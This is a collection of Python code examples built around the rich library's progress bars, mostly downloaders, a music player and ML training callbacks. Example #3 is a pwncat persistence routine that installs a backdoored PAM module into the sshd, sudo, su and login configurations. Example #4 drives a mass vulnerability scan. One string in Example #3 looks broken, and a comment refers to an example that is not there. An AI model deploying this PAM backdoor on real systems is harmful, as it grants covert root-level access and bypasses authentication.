Example #1
class Downloader:
    def __init__(self):
        self.exit = False
        # <--- settings from the command line --->
        self.max_concurrent_downloads = 1
        # <--- progress bar --->
        self.progress = Progress(
            TextColumn("[bold blue]{task.fields[name]}", justify="right"),
            BarColumn(bar_width=None),
            "[progress.percentage]{task.percentage:>3.2f}%",
            "•",
            DownloadColumn(),
            "•",
            TransferSpeedColumn(),
            "•",
            TimeRemainingColumn(),
        )

    def daemon(self, args: Namespace):
        '''
        Loop forever, scheduling downloads and updating progress.
        '''
        if args.repl is False:
            self.download_one_stream(args)
            # click.secho('Download end.')
            return
        while self.exit:  # placeholder REPL loop; exits immediately
            break

    def download_one_stream(self, args: Namespace):
        extractor = Extractor(args)
        streams = extractor.fetch_metadata(args.URI[0])
        loop = get_event_loop()
        loop.run_until_complete(self.download_all_segments(loop, streams))
        loop.close()

    async def download_all_segments(self, loop: AbstractEventLoop,
                                    streams: List[Stream]):
        for index, stream in enumerate(streams):
            stream.show_info(index)
        all_results = []
        for stream in streams:
            click.secho(f'{stream.name} download start.')
            max_failed = 5
            while max_failed > 0:
                results = await self.do_with_progress(loop, stream)
                all_results.append(results)
                count_none, count_true, count_false = 0, 0, 0
                for _, flag in results.items():
                    if flag is True:
                        count_true += 1
                    elif flag is False:
                        count_false += 1
                    else:
                        count_none += 1
                # any False means the stream cannot be downloaded
                if count_false > 0:
                    break
                # no False: any None means segments remain to retry; otherwise merge
                if count_none > 0:
                    max_failed -= 1
                    continue
                else:
                    stream.concat()
                    break
        return all_results

    def get_left_segments(self, stream: Stream):
        completed = 0
        _left_segments = []
        for segment in stream.segments:
            segment_path = segment.get_path()
            if segment_path.exists() is True:
                # the file is on disk, so its download definitely succeeded
                if segment_path.stat().st_size == 0:
                    segment_path.unlink()
                else:
                    completed += segment_path.stat().st_size
                    continue
            _left_segments.append(segment)
        return completed, _left_segments

    def init_progress(self, stream: Stream, completed: int):
        stream_id = self.progress.add_task("download",
                                           name=stream.name,
                                           start=False)  # TaskID
        if completed > 0:
            if stream.filesize > 0:
                total = stream.filesize
            else:
                total = completed
                stream.filesize = total
            self.progress.update(stream_id, completed=completed, total=total)
        else:
            if stream.filesize > 0:
                total = stream.filesize
            else:
                total = 0
                stream.filesize = total
            self.progress.update(stream_id, total=total)
        return stream_id

    async def do_with_progress(self, loop: AbstractEventLoop, stream: Stream):
        '''
        Report progress while downloading and handle exceptions sensibly.
        '''
        results = {}  # type: Dict[Segment, Optional[bool]]
        tasks = set()  # type: Set[Task]

        def _done_callback(_future: Future) -> None:
            nonlocal results
            if _future.exception() is None:
                segment, status, flag = _future.result()
                if flag is None:
                    print('Known exception during download; segment needs to be retried\n')
                elif flag is False:
                    # known fatal cases (bad status code, missing Content-Length) mean the stream cannot be downloaded, so bail out
                    if status in ['STATUS_CODE_ERROR', 'NO_CONTENT_LENGTH']:
                        # print('m3u8 cannot be downloaded; cancelling the other tasks\n')
                        cancel_all_task()
                    else:
                        print(f'Unknown status -> {status}; cancelling the other tasks\n')
                        cancel_all_task()
                results[segment] = flag
            else:
                # unknown exception: force-cancel every task
                print('Unknown exception; cancelling all tasks\n')
                cancel_all_task()
                # _future.result() was never called in this branch, so `segment`
                # is unbound here; record the failure under a placeholder key
                # (as Example #11 below does)
                results['unknown segment'] = False

        def cancel_all_task() -> None:
            for task in tasks:
                task.remove_done_callback(_done_callback)
            for task in filter(lambda task: not task.done(), tasks):
                task.cancel()

        completed, _left = self.get_left_segments(stream)
        if len(_left) == 0:
            return results
        # nothing left to download, so try to merge; a False return means the download still has to be completed
        with self.progress:
            stream_id = self.init_progress(stream, completed)
            connector = TCPConnector(ttl_dns_cache=300,
                                     limit_per_host=4,
                                     limit=100,
                                     force_close=True,
                                     enable_cleanup_closed=True)
            for segment in _left:
                task = loop.create_task(
                    self.download(connector, stream_id, stream, segment))
                task.add_done_callback(_done_callback)
                tasks.add(task)
            finished, unfinished = await asyncio.wait(tasks)
            # block until every task has finished
        return results

    async def download(self, connector: TCPConnector, stream_id: TaskID,
                       stream: Stream, segment: Segment):
        status, flag = 'EXIT', True
        try:
            async with request('GET',
                               segment.url,
                               connector=connector,
                               headers=segment.headers) as response:
                if response.status == 405:
                    status = 'STATUS_CODE_ERROR'
                    flag = False
                elif response.headers.get('Content-length') is None:
                    status = 'NO_CONTENT_LENGTH'
                    flag = False
                else:
                    stream.filesize += int(response.headers["Content-length"])
                    self.progress.update(stream_id, total=stream.filesize)
                    self.progress.start_task(stream_id)
                    while True:
                        data = await response.content.read(512)
                        if not data:
                            break
                        segment.content.append(data)
                        self.progress.update(stream_id, advance=len(data))
        except ClientConnectorError:
            return segment, 'ClientConnectorError', None
        except ClientPayloadError:
            return segment, 'ClientPayloadError', None
        except ConnectionResetError:
            return segment, 'ConnectionResetError', None
        except Exception:
            # print(e, f'{status}\n')
            return segment, status, False
        if flag is False:
            return segment, status, False
        return segment, 'SUCCESS', await self.decrypt(segment)

    async def decrypt(self, segment: Segment) -> bool:
        '''
        Decryption step.
        '''
        if segment.is_encrypt():
            cipher = CommonAES(segment.xkey.key,
                               binascii.a2b_hex(segment.xkey.iv))
            return cipher.decrypt(segment)
        else:
            return segment.dump()
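
The retry loop in download_all_segments above hinges on a three-valued result protocol: True marks a finished segment, None a retryable failure, and False a fatal one. A minimal self-contained sketch of that protocol, with a random stand-in (fake_fetch) for the real download coroutine; the integer "segments" and all names here are illustrative, not part of the original project:

import random
from typing import Dict, List, Optional

def fake_fetch(segment: int) -> Optional[bool]:
    # Stand-in for Downloader.download:
    # True = success, None = retryable error, False = fatal error.
    return random.choice([True, True, None])

def download_with_retries(segments: List[int], max_failed: int = 5) -> bool:
    while max_failed > 0:
        results: Dict[int, Optional[bool]] = {s: fake_fetch(s) for s in segments}
        if any(flag is False for flag in results.values()):
            return False  # fatal: the stream cannot be downloaded
        segments = [s for s, flag in results.items() if flag is None]
        if segments:
            max_failed -= 1  # transient failures: retry just those segments
            continue
        return True  # every segment landed, safe to concat
    return False  # retry budget exhausted

print(download_with_retries(list(range(10))))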
Example #2
def play(playlist: int, random_play: bool):
    """播放歌单

    如果没有指定歌单id,默认播放名为 `我喜欢的音乐` 的歌单

    默认循环播放列表,可以使用 --random 选项来随机播放

    Args:
        playlist (int): 歌单id
        random (bool): 是否随机播放
    """
    if not playlist:
        user_playlist = api.get_user_playlist()
        for pl in user_playlist.playlist:
            if pl.name == '我喜欢的音乐':
                playlist = pl.id
                break

        if not playlist:
            rich.print('[red]Playlist not found')
            return

    # start progress rendering in a separate thread immediately
    progress = Progress(
        '[yellow]{task.fields[status]}[/yellow] '
        '[progress.description]{task.description}',
        '[blue]{task.fields[encode]}',
        '[cyan]{task.fields[quality]}',
        BarColumn(),
        TotalFileSizeColumn(),
        '[progress.percentage]{task.percentage:>3.0f}%',
    )
    Thread(target=progress.start, name='progress rendering').start()

    # initialize task queue
    task_queue: Queue[CachingMusicFileTask] = Queue(2)

    # initialize the play task
    play_task_id = progress.add_task('play',
                                     start=False,
                                     total=0,
                                     status='P',
                                     encode='-',
                                     quality='-')

    # start download threads
    thread_1 = CachingMusicFile(task_queue)
    thread_1.start()
    thread_2 = CachingMusicFile(task_queue)
    thread_2.start()

    # initialize tasks
    tasks = []
    tracks = api.get_playlist_detail(playlist).playlist.tracks
    tracks_id = list(map(lambda t: t.id, tracks))
    musics = api.get_songs_url(tracks_id, 0).data
    for track, music in zip(tracks, musics):
        music_cache_path = os.path.join(config.cache_folder,
                                        f'{track.id}.{music.type}')
        tasks.append(
            CachingMusicFileTask(
                progress,
                progress.add_task(f'{track.name}',
                                  total=0,
                                  encode=music.type,
                                  quality=f'{music.br/1000}K',
                                  status='D'), music.url, music_cache_path))

    # initialize download task queue
    def feed_task_queue():
        for task in tasks:
            task_queue.put(task)

    Thread(target=feed_task_queue, name='task producer').start()

    # start play
    local_musics = list(zip(tracks, musics))
    last_play_obj = None
    idx = 0
    while True:
        if random_play:
            track, music = random.choice(local_musics)
        else:
            if idx >= len(local_musics):
                idx = 0
            track, music = local_musics[idx]
            idx += 1

        local_path = os.path.join(config.cache_folder,
                                  f'{track.id}.{music.type}')
        progress.update(play_task_id, description=track.name)

        if Path(local_path).is_file():
            mf = mad.MadFile(Path(local_path).open('rb'))
            while True:
                buf = mf.read()
                if buf is None:
                    break

                if last_play_obj is not None and last_play_obj.is_playing():
                    last_play_obj.wait_done()

                last_play_obj = sa.play_buffer(buf, 2, 2, mf.samplerate())
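
The bounded Queue(2) above is what keeps the player at most two tracks ahead of playback: task_queue.put() blocks the producer thread until one of the CachingMusicFile workers frees a slot. A minimal sketch of that producer/consumer shape with plain threads; the sleep stands in for caching one file, and none of the music API types are involved:

import time
from queue import Queue
from threading import Thread

task_queue: Queue = Queue(maxsize=2)  # producer blocks once two jobs are pending

def worker() -> None:
    while True:
        job = task_queue.get()
        if job is None:  # sentinel: shut this worker down
            task_queue.task_done()
            break
        time.sleep(0.1)  # stand-in for downloading one music file
        task_queue.task_done()

workers = [Thread(target=worker) for _ in range(2)]
for w in workers:
    w.start()

for job in range(10):
    task_queue.put(job)  # blocks while the queue is full
for _ in workers:
    task_queue.put(None)
task_queue.join()  # wait until every job and sentinel is processed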
Example #3
    def install(self, user: Optional[str] = None):
        """ Install the persistence method """

        if pwncat.victim.current_user.id != 0:
            raise PersistenceError("must be root")

        try:
            # Enumerate SELinux state
            selinux = pwncat.victim.enumerate.first("system.selinux").data
            # If enabled and enforced, it will block this from working
            if selinux.enabled and "enforc" in selinux.mode:
                raise PersistenceError("selinux is currently in enforce mode")
            elif selinux.enabled:
                # If enabled but permissive, it will log this module
                console.log(
                    "[yellow]warning[/yellow]: selinux is enabled; persistence may be logged"
                )
        except ValueError:
            # SELinux not found
            pass

        # We use the backdoor password. Build the string of encoded bytes
        # These are placed in the source like: char password_hash[] = {0x01, 0x02, 0x03, ...};
        password = hashlib.sha1(
            pwncat.victim.config["backdoor_pass"].encode("utf-8")
        ).digest()
        password = "******".join(hex(c) for c in password)

        # Insert our key
        sneaky_source = self.sneaky_source.replace("__PWNCAT_HASH__", password)

        # Insert the log location for successful passwords
        sneaky_source = sneaky_source.replace("__PWNCAT_LOG__", "/var/log/firstlog")

        progress = Progress(
            "installing pam module",
            "•",
            "[cyan]{task.fields[status]}",
            transient=True,
            console=console,
        )
        task = progress.add_task("", status="initializing")

        # Write the source
        try:
            progress.start()

            progress.update(task, status="compiling shared library")

            try:
                # Compile our source for the remote host
                lib_path = pwncat.victim.compile(
                    [io.StringIO(sneaky_source)],
                    suffix=".so",
                    cflags=["-shared", "-fPIE"],
                    ldflags=["-lcrypto"],
                )
            except (FileNotFoundError, CompilationError) as exc:
                raise PersistenceError(f"pam: compilation failed: {exc}")

            progress.update(task, status="locating pam module installation")

            # Locate the pam_deny.so to know where to place the new module
            pam_modules = "/usr/lib/security"
            try:
                results = (
                    pwncat.victim.run(
                        "find / -name pam_deny.so 2>/dev/null | grep -v 'snap/'"
                    )
                    .strip()
                    .decode("utf-8")
                )
                if results != "":
                    results = results.split("\n")
                    pam_modules = os.path.dirname(results[0])
            except FileNotFoundError:
                pass

            progress.update(task, status=f"pam modules located at {pam_modules}")

            # Ensure the directory exists and is writable
            access = pwncat.victim.access(pam_modules)
            if (Access.DIRECTORY | Access.WRITE) in access:
                # Copy the module to a non-suspicious path
                progress.update(task, status="copying shared library")
                pwncat.victim.env(
                    ["mv", lib_path, os.path.join(pam_modules, "pam_succeed.so")]
                )
                new_line = "auth\tsufficient\tpam_succeed.so\n"

                progress.update(task, status="adding pam auth configuration")

                # Add this auth method to the following pam configurations
                for config in ["sshd", "sudo", "su", "login"]:
                    progress.update(
                        task, status=f"adding pam auth configuration: {config}"
                    )
                    config = os.path.join("/etc/pam.d", config)
                    try:
                        # Read the original content
                        with pwncat.victim.open(config, "r") as filp:
                            content = filp.readlines()
                    except (PermissionError, FileNotFoundError):
                        continue

                    # We need to know if there is a rootok line. If there is,
                    # we should add our line after it to ensure that rootok still
                    # works.
                    contains_rootok = any("pam_rootok" in line for line in content)

                    # Add this auth statement before the first auth statement
                    for i, line in enumerate(content):
                        # We either insert after the rootok line or before the first
                        # auth line, depending on whether rootok is present
                        if contains_rootok and "pam_rootok" in line:
                            content.insert(i + 1, new_line)
                            break
                        elif not contains_rootok and line.startswith("auth"):
                            content.insert(i, new_line)
                            break
                    else:
                        content.append(new_line)

                    content = "".join(content)

                    try:
                        with pwncat.victim.open(
                            config, "w", length=len(content)
                        ) as filp:
                            filp.write(content)
                    except (PermissionError, FileNotFoundError):
                        continue

                pwncat.victim.tamper.created_file("/var/log/firstlog")

        except FileNotFoundError as exc:
            # A needed binary wasn't found. Clean up whatever we created.
            raise PersistenceError(str(exc))
        finally:
            progress.stop()
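
The pam.d editing rules above reduce to a small pure function, which is easier to test in isolation: insert after pam_rootok when present (so root logins keep working), otherwise before the first auth rule, otherwise append. A sketch under that reading; insert_auth_line is an illustrative name, not pwncat API:

def insert_auth_line(lines: list,
                     new_line: str = "auth\tsufficient\tpam_succeed.so\n") -> list:
    contains_rootok = any("pam_rootok" in line for line in lines)
    for i, line in enumerate(lines):
        if contains_rootok and "pam_rootok" in line:
            lines.insert(i + 1, new_line)  # keep rootok ahead of our rule
            break
        if not contains_rootok and line.startswith("auth"):
            lines.insert(i, new_line)  # take precedence over the first auth rule
            break
    else:
        lines.append(new_line)  # no matching line at all
    return lines

print(insert_auth_line(["auth\trequired\tpam_unix.so\n"]))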
Example #4
    def main(self):
        q_targets = multiprocessing.Manager().Queue()  # targets Queue

        q_targets_list = []
        q_results = multiprocessing.Manager().Queue()  # results Queue
        fofa_result = multiprocessing.Manager().Queue()  # fofa results Queue
        # scan processes may only start exiting once target preparation is done
        process_targets_done = multiprocessing.Value('i', 0)

        for input_file in self.input_files:
            # read targets
            if self.host:
                target_list = self.host.replace(',', ' ').strip().split()

            elif self.file or self.dire:
                with open(input_file, encoding='UTF-8',
                          errors='ignore') as inFile:
                    target_list = list(set(inFile.readlines()))

            try:
                import threading
                # generate the report in real time
                target_count = len(target_list)  # number of targets
                # generate the report and manage standard output
                threading.Thread(target=save_report,
                                 args=(self, q_results, input_file,
                                       target_count)).start()

                clear_queue(q_results)
                clear_queue(q_targets)

                process_targets_done.value = 0
                start_time = time.time()

                p = multiprocessing.Process(target=prepare_targets,
                                            args=(target_list, q_targets, self,
                                                  fofa_result))
                p.daemon = True
                p.start()
                p.join()  # join blocks the calling thread: after p.start(), wait for p to finish before continuing
                time.sleep(1.0)  # let the prepare_targets process start running as soon as possible

                logger.log(
                    'INFOR',
                    'All preparations have been completed and it took %.1f seconds!'
                    % (time.time() - start_time))

                # size the process pool to the machine's CPU core count
                # count = multiprocessing.cpu_count()
                count = 30
                # with few targets, spawn at most 2x as many scan processes
                if len(target_list) * 2 < count:
                    count = len(target_list) * 2

                if self.fofa and fofa_result.qsize() > 0:
                    # save fofa search results
                    save_fofa(self, fofa_result, input_file)

                while True:
                    if not q_targets.empty():
                        q_targets_list.append(q_targets.get())
                    else:
                        break

                # q_targets.get() {'scheme': 'https', 'host': '127.0.0.1', 'port': 443, 'path': '', 'ports_open': [80, 443], 'is_neighbor': 0}
                progress = Progress(
                    "[progress.description]{task.description}",
                    BarColumn(),
                    "[progress.percentage]{task.percentage:>3.1f}%",
                    "•",
                    "[bold green]{task.completed}/{task.total}",
                    transient=True,  # hide the bar after reaching 100%
                )

                with progress:
                    targets = []
                    for target in q_targets_list:
                        tmp = [target, q_results, self]
                        targets.append(tmp)

                    progress_bar = progress.add_task("[cyan]Leak detection...",
                                                     total=len(targets),
                                                     start=False)

                    with multiprocessing.Pool(processes=count) as pool:
                        results = pool.imap_unordered(scan_process, targets)
                        for result in results:
                            # progress.print(result)
                            progress.advance(progress_bar)

                        pool.close()
                        pool.join()
                        time.sleep(1.0)  # short grace period after the pool drains

                cost_time = time.time() - start_time
                cost_min = int(cost_time / 60)
                cost_min = '%s min ' % cost_min if cost_min > 0 else ''
                cost_seconds = '%.1f' % (cost_time % 60)
                logger.log(
                    'INFOR',
                    f'Scanned {len(q_targets_list)} targets in {cost_min}{cost_seconds} seconds.'
                )
            except Exception as e:
                logger.log('FATAL', '[__main__.exception] %s' % repr(e))
                import traceback
                logger.log('FATAL', traceback.format_exc())
            setting.stop_me = True
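
Stripped of the queues and reporting threads, the heart of the scan above is iterating pool.imap_unordered and ticking the bar once per finished result. A self-contained sketch of just that pattern; scan is a stand-in for scan_process:

import multiprocessing
import time
from rich.progress import BarColumn, Progress

def scan(target: int) -> int:
    time.sleep(0.01)  # stand-in for one leak-detection scan
    return target

if __name__ == "__main__":
    targets = list(range(100))
    progress = Progress(
        "[progress.description]{task.description}",
        BarColumn(),
        "[bold green]{task.completed}/{task.total}",
        transient=True,
    )
    with progress:
        bar = progress.add_task("[cyan]Scanning...", total=len(targets))
        with multiprocessing.Pool(processes=4) as pool:
            for _ in pool.imap_unordered(scan, targets):
                progress.advance(bar)  # one tick per completed target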
Example #5
class WallHaven(object):
    def __init__(self) -> None:
        self.base_url = "https://wallhaven.cc/search?q=like%3Arddgwm&page="
        self.progress = Progress()

    async def get_list_image_page(self, session: ClientSession,
                                  url: str) -> None:
        """获取图片列表页"""
        try:
            async with session.get(url) as resp:
                if resp.status == 200:
                    html = await resp.text(encoding="utf8")
                    if html:
                        await self.parse_image_link(session, html)
                    return
                return
        except ClientResponseError:
            return

    async def parse_image_link(self, session: ClientSession,
                               html: str) -> None:
        """解析列表页小图链接"""
        element = etree.HTML(html)
        links = element.xpath('//img[@alt="loading"]/@data-src')
        for image_link in links:
            image_link = await self.image_link_process(image_link)
            await self.download_image(session, image_link)

    @staticmethod
    async def image_link_process(image_link: str) -> str:
        """转换图片链接"""
        if "small" in image_link:
            image_link = image_link.replace("th", "w")
            image_link = image_link.replace("small", "full")
            url_path = image_link.split("/")
            url_path[-1] = f"wallhaven-{url_path[-1]}"
            image_link = "/".join(url_path)
            return image_link

    async def download_image(self, session: ClientSession,
                             image_link: str) -> None:
        """下载图片"""
        async with session.get(image_link) as resp:
            try:
                # total length of the image in bytes
                file_size = int(resp.headers['content-length'])
                if resp.status == 200:
                    file_name = image_link.split("/")[-1]
                    async with aiofiles.open(file=f"images/{file_name}",
                                             mode="ab") as f:
                        self.progress.start()
                        task = self.progress.add_task(
                            f'[red]Downloading...{file_name}', total=file_size)
                        while True:
                            chunk = await resp.content.read(1024)
                            if not chunk:
                                break
                            await f.write(chunk)
                            self.progress.update(task, advance=len(chunk))  # advance by the bytes actually read
                        self.progress.stop()
            except Exception:
                return

    async def run(self):
        headers = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
        }
        # cap the maximum number of connections
        async with aiohttp.TCPConnector(
            limit=200,
            force_close=True,
            enable_cleanup_closed=True,
        ) as tc:
            # create the session object
            async with ClientSession(connector=tc, headers=headers) as session:
                urls = [f"{self.base_url}{i}" for i in range(1, 9)]
                # create the tasks
                tasks = [
                    asyncio.ensure_future(
                        self.get_list_image_page(session, url)) for url in urls
                ]
                # wait for the tasks to finish
                await asyncio.gather(*tasks)
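
The download loop above generalizes to any chunked HTTP fetch: take the total from Content-Length, then advance by the size of each chunk actually read (a fixed advance=1024 would over-count the final short chunk, hence the fix above). A self-contained sketch; the URL and output path are placeholders:

import asyncio
import aiohttp
from rich.progress import Progress

async def fetch(url: str, dest: str) -> None:
    async with aiohttp.ClientSession() as session:
        async with session.get(url) as resp:
            total = int(resp.headers.get("Content-Length", 0)) or None
            with Progress() as progress, open(dest, "wb") as f:
                task = progress.add_task("download", total=total)
                async for chunk in resp.content.iter_chunked(1024):
                    f.write(chunk)
                    progress.update(task, advance=len(chunk))  # bytes actually read

asyncio.run(fetch("https://wallhaven.cc/", "page.html"))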
Example #6
def run():
    """
    Run the Console Interface for Unsilence
    :return: None
    """
    sys.tracebacklimit = 0

    args = parse_arguments()
    console = Console()

    if args.debug:
        sys.tracebacklimit = 1000

    if args.output_file.exists() and not args.non_interactive_mode:
        if not choice_dialog(
                console, "File already exists. Overwrite?", default=False):
            return

    args_dict = vars(args)

    argument_list_for_silence_detect = [
        "silence_level", "silence_time_threshold", "short_interval_threshold",
        "stretch_time"
    ]

    argument_dict_for_silence_detect = {
        key: args_dict[key]
        for key in argument_list_for_silence_detect if key in args_dict.keys()
    }

    argument_list_for_renderer = [
        "audio_only", "audible_speed", "silent_speed", "audible_volume",
        "silent_volume", "drop_corrupted_intervals", "threads"
    ]

    argument_dict_for_renderer = {
        key: args_dict[key]
        for key in argument_list_for_renderer if key in args_dict.keys()
    }

    progress = Progress()

    continual = Unsilence(args.input_file)

    with progress:

        def update_task(current_task):
            def handler(current_val, total):
                progress.update(current_task,
                                total=total,
                                completed=current_val)

            return handler

        silence_detect_task = progress.add_task("Calculating Intervals...",
                                                total=1)

        continual.detect_silence(
            on_silence_detect_progress_update=update_task(silence_detect_task),
            **argument_dict_for_silence_detect)

        progress.stop()
        progress.remove_task(silence_detect_task)

        print()

        estimated_time = continual.estimate_time(args.audible_speed,
                                                 args.silent_speed)
        console.print(pretty_time_estimate(estimated_time))

        print()

        if not args.non_interactive_mode:
            if not choice_dialog(
                    console, "Continue with these options?", default=True):
                return

        progress.start()
        rendering_task = progress.add_task("Rendering Intervals...", total=1)
        concat_task = progress.add_task("Combining Intervals...", total=1)

        continual.render_media(
            args.output_file,
            on_render_progress_update=update_task(rendering_task),
            on_concat_progress_update=update_task(concat_task),
            **argument_dict_for_renderer)

        progress.stop()

    console.print("\n[green]Finished![/green] :tada:")
Example #7
class KrakenTrainProgressBar(ProgressBarBase):
    """
    Adaptation of the default ptl rich progress bar to fit with kraken (segtrain, train) output.

    Args:
        refresh_rate: Determines at which rate (in number of batches) the progress bars get updated.
            Set it to ``0`` to disable the display.
        leave: Leaves the finished progress bar in the terminal at the end of the epoch. Default: False
        console_kwargs: Args for constructing a `Console`
    """
    def __init__(self,
                 refresh_rate: int = 1,
                 leave: bool = True,
                 console_kwargs: Optional[Dict[str, Any]] = None) -> None:
        super().__init__()
        self._refresh_rate: int = refresh_rate
        self._leave: bool = leave
        self._console_kwargs = console_kwargs or {}
        self._enabled: bool = True
        self.progress: Optional[Progress] = None
        self.val_sanity_progress_bar_id: Optional[int] = None
        self._reset_progress_bar_ids()
        self._metric_component = None
        self._progress_stopped: bool = False

    @property
    def refresh_rate(self) -> float:
        return self._refresh_rate

    @property
    def is_enabled(self) -> bool:
        return self._enabled and self.refresh_rate > 0

    @property
    def is_disabled(self) -> bool:
        return not self.is_enabled

    def disable(self) -> None:
        self._enabled = False

    def enable(self) -> None:
        self._enabled = True

    @property
    def sanity_check_description(self) -> str:
        return "Validation Sanity Check"

    @property
    def validation_description(self) -> str:
        return "Validation"

    @property
    def test_description(self) -> str:
        return "Testing"

    def _init_progress(self, trainer):
        if self.is_enabled and (self.progress is None
                                or self._progress_stopped):
            self._reset_progress_bar_ids()
            self._console = Console(**self._console_kwargs)
            self._console.clear_live()
            columns = self.configure_columns(trainer)
            self._metric_component = MetricsTextColumn(trainer)
            columns.append(self._metric_component)

            if trainer.early_stopping_callback:
                self._early_stopping_component = EarlyStoppingColumn(trainer)
                columns.append(self._early_stopping_component)

            self.progress = Progress(*columns,
                                     auto_refresh=False,
                                     disable=self.is_disabled,
                                     console=self._console)
            self.progress.start()
            # progress has started
            self._progress_stopped = False

    def refresh(self) -> None:
        if self.progress:
            self.progress.refresh()

    def on_train_start(self, trainer, pl_module):
        self._init_progress(trainer)

    def on_test_start(self, trainer, pl_module):
        self._init_progress(trainer)

    def on_validation_start(self, trainer, pl_module):
        self._init_progress(trainer)

    def on_sanity_check_start(self, trainer, pl_module):
        self._init_progress(trainer)

    def on_sanity_check_end(self, trainer, pl_module):
        if self.progress is not None:
            self.progress.update(self.val_sanity_progress_bar_id,
                                 advance=0,
                                 visible=False)
        self.refresh()

    def on_train_epoch_start(self, trainer, pl_module):
        total_train_batches = self.total_train_batches
        total_val_batches = self.total_val_batches
        if total_train_batches != float("inf"):
            # val can be checked multiple times per epoch
            val_checks_per_epoch = total_train_batches // trainer.val_check_batch
            total_val_batches = total_val_batches * val_checks_per_epoch

        total_batches = total_train_batches + total_val_batches

        train_description = f"stage {trainer.current_epoch}/{trainer.max_epochs if pl_module.hparams.quit == 'dumb' else '∞'}"
        if len(self.validation_description) > len(train_description):
            # Padding is required to avoid flickering due to uneven lengths of "Epoch X"
            # and "Validation" bar descriptions
            num_digits = len(str(trainer.current_epoch))
            required_padding = (len(self.validation_description) -
                                len(train_description) + 1) - num_digits
            for _ in range(required_padding):
                train_description += " "

        if self.main_progress_bar_id is not None and self._leave:
            self._stop_progress()
            self._init_progress(trainer)
        if self.main_progress_bar_id is None:
            self.main_progress_bar_id = self._add_task(total_batches,
                                                       train_description)
        elif self.progress is not None:
            self.progress.reset(self.main_progress_bar_id,
                                total=total_batches,
                                description=train_description,
                                visible=True)
        self.refresh()

    def on_validation_epoch_start(self, trainer, pl_module):
        if trainer.sanity_checking:
            self.val_sanity_progress_bar_id = self._add_task(
                self.total_val_batches, self.sanity_check_description)
        else:
            self.val_progress_bar_id = self._add_task(
                self.total_val_batches,
                self.validation_description,
                visible=False)
        self.refresh()

    def _add_task(self,
                  total_batches: int,
                  description: str,
                  visible: bool = True) -> Optional[int]:
        if self.progress is not None:
            return self.progress.add_task(f"{description}",
                                          total=total_batches,
                                          visible=visible)

    def _update(self,
                progress_bar_id: int,
                current: int,
                total: Union[int, float],
                visible: bool = True) -> None:
        if self.progress is not None and self._should_update(current, total):
            leftover = current % self.refresh_rate
            advance = leftover if (current == total
                                   and leftover != 0) else self.refresh_rate
            self.progress.update(progress_bar_id,
                                 advance=advance,
                                 visible=visible)
            self.refresh()

    def _should_update(self, current: int, total: Union[int, float]) -> bool:
        return self.is_enabled and (current % self.refresh_rate == 0
                                    or current == total)

    def on_validation_epoch_end(self, trainer, pl_module):
        if self.val_progress_bar_id is not None and trainer.state.fn == "fit":
            self.progress.update(self.val_progress_bar_id,
                                 advance=0,
                                 visible=False)
            self.refresh()

    def on_validation_end(self, trainer: "pl.Trainer",
                          pl_module: "pl.LightningModule") -> None:
        if trainer.state.fn == "fit":
            self._update_metrics(trainer, pl_module)

    def on_test_epoch_start(self, trainer, pl_module):
        self.test_progress_bar_id = self._add_task(self.total_test_batches,
                                                   self.test_description)
        self.refresh()

    def on_train_batch_end(self, trainer, pl_module, outputs, batch,
                           batch_idx):
        self._update(self.main_progress_bar_id, self.train_batch_idx,
                     self.total_train_batches)
        self._update_metrics(trainer, pl_module)
        self.refresh()

    def on_train_epoch_end(self, trainer: "pl.Trainer",
                           pl_module: "pl.LightningModule") -> None:
        self._update_metrics(trainer, pl_module)

    def on_validation_batch_end(self, trainer, pl_module, outputs, batch,
                                batch_idx, dataloader_idx):
        if trainer.sanity_checking:
            self._update(self.val_sanity_progress_bar_id, self.val_batch_idx,
                         self.total_val_batches)
        elif self.val_progress_bar_id is not None:
            # check to see if we should update the main training progress bar
            if self.main_progress_bar_id is not None:
                self._update(self.main_progress_bar_id, self.val_batch_idx,
                             self.total_val_batches)
            self._update(self.val_progress_bar_id, self.val_batch_idx,
                         self.total_val_batches)
        self.refresh()

    def on_test_batch_end(self, trainer, pl_module, outputs, batch, batch_idx,
                          dataloader_idx):
        self._update(self.test_progress_bar_id, self.test_batch_idx,
                     self.total_test_batches)
        self.refresh()

    def _stop_progress(self) -> None:
        if self.progress is not None:
            self.progress.stop()
            # signals for progress to be re-initialized for next stages
            self._progress_stopped = True

    def _reset_progress_bar_ids(self):
        self.main_progress_bar_id: Optional[int] = None
        self.val_progress_bar_id: Optional[int] = None
        self.test_progress_bar_id: Optional[int] = None

    def _update_metrics(self, trainer, pl_module) -> None:
        metrics = self.get_metrics(trainer, pl_module)
        metrics.pop('loss', None)
        metrics.pop('val_metric', None)
        if self._metric_component:
            self._metric_component.update(metrics)

    def teardown(self,
                 trainer,
                 pl_module,
                 stage: Optional[str] = None) -> None:
        self._stop_progress()

    def on_exception(self, trainer, pl_module,
                     exception: BaseException) -> None:
        self._stop_progress()

    @property
    def val_progress_bar(self) -> Task:
        return self.progress.tasks[self.val_progress_bar_id]

    @property
    def val_sanity_check_bar(self) -> Task:
        return self.progress.tasks[self.val_sanity_progress_bar_id]

    @property
    def main_progress_bar(self) -> Task:
        return self.progress.tasks[self.main_progress_bar_id]

    @property
    def test_progress_bar(self) -> Task:
        return self.progress.tasks[self.test_progress_bar_id]

    def configure_columns(self, trainer) -> list:
        return [
            TextColumn("[progress.description]{task.description}"),
            BarColumn(),
            BatchesProcessedColumn(),
            TimeRemainingColumn(),
            TimeElapsedColumn()
        ]
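
MetricsTextColumn, EarlyStoppingColumn and BatchesProcessedColumn above are kraken-specific, but each boils down to subclassing rich's ProgressColumn and implementing render(task). A minimal custom column in the same spirit; CompletedOfTotalColumn is an illustrative name, not the kraken implementation:

from rich.progress import Progress, ProgressColumn, Task
from rich.text import Text

class CompletedOfTotalColumn(ProgressColumn):
    """Render 'completed/total' next to the bar."""
    def render(self, task: Task) -> Text:
        total = int(task.total) if task.total is not None else "?"
        return Text(f"{int(task.completed)}/{total}", style="green")

with Progress(CompletedOfTotalColumn()) as progress:
    t = progress.add_task("train", total=10)
    for _ in range(10):
        progress.advance(t)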
Example #8
class Video:
    def __init__(
        self,
        camera: Optional[int] = None,
        input_path: Optional[str] = None,
        output_path: str = ".",
        output_fps: Optional[float] = None,
        label: str = "",
        codec_fourcc: Optional[str] = None,
    ):
        self.camera = camera
        self.input_path = input_path
        self.output_path = output_path
        self.label = label
        self.codec_fourcc = codec_fourcc
        self.output_video: Optional[cv2.VideoWriter] = None

        # Input validation
